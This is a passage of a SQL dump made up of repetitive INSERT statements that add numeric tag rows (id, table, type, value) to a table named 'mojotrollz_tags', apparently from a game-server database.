`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22427, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22427, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22427, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22427, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22427, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22428, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22428, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22428, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22428, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22428, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22429, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22429, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22429, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22429, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22429, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22430, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22430, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22430, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22430, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22430, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22431, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22431, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22431, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22431, 3, 20, 4, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22431, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22436, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22436, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22436, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22436, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22436, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22437, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22437, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22437, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22437, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22437, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22438, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22438, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22438, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22438, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22438, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22439, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22439, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22439, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22439, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22439, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22440, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22440, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22440, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22440, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22440, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22441, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22441, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22441, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22441, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22441, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22442, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22442, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22442, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22442, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22442, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22443, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22443, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22443, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22443, 3, 20, 8, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22443, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22464, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22464, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22464, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22464, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22464, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22465, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22465, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22465, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22465, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22465, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22466, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22466, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22466, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22466, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22466, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22467, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22467, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22467, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22467, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22467, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22468, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22468, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22468, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22468, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22468, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22469, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22469, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22469, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22469, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22469, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22470, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22470, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22470, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22470, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22470, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22471, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22471, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22471, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22471, 3, 20, 18, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22471, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22476, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22476, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22476, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22476, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22476, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22477, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22477, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22477, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22477, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22477, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22478, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22478, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22478, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22478, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22478, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22479, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22479, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22479, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22479, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22479, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22480, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22480, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22480, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22480, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22480, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22481, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22481, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22481, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22481, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22481, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22482, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22482, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22482, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22482, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22482, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22483, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22483, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22483, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22483, 3, 20, 10, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22483, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22488, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22488, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22488, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22488, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22488, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22489, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22489, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22489, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22489, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22489, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22490, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22490, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22490, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22490, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22490, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22491, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22491, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22491, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22491, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22492, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22492, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22492, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22492, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22492, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22493, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22493, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22493, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22493, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22493, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22494, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22494, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22494, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22494, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22494, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22495, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22495, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22495, 3, 20, 27, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22495, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22496, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22496, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22496, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22496, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22496, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22497, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22497, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22497, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22497, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22497, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22498, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22498, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22498, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22498, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22498, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22499, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22499, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22499, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22499, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22499, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22500, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22500, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22500, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22500, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22500, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22501, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22501, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22501, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22501, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22501, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22502, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22502, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22502, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22502, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22502, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22503, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22503, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22503, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22503, 3, 20, 20, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22503, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22504, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22504, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22504, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22504, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22504, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22505, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22505, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22505, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22505, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22505, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22506, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22506, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22506, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22506, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22506, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22507, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22507, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22507, 3, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22507, 3, 20, 22, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22507, 3, 21, 50, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22508, 3, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22508, 3, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (22508, 3, 10, 1, NULL); 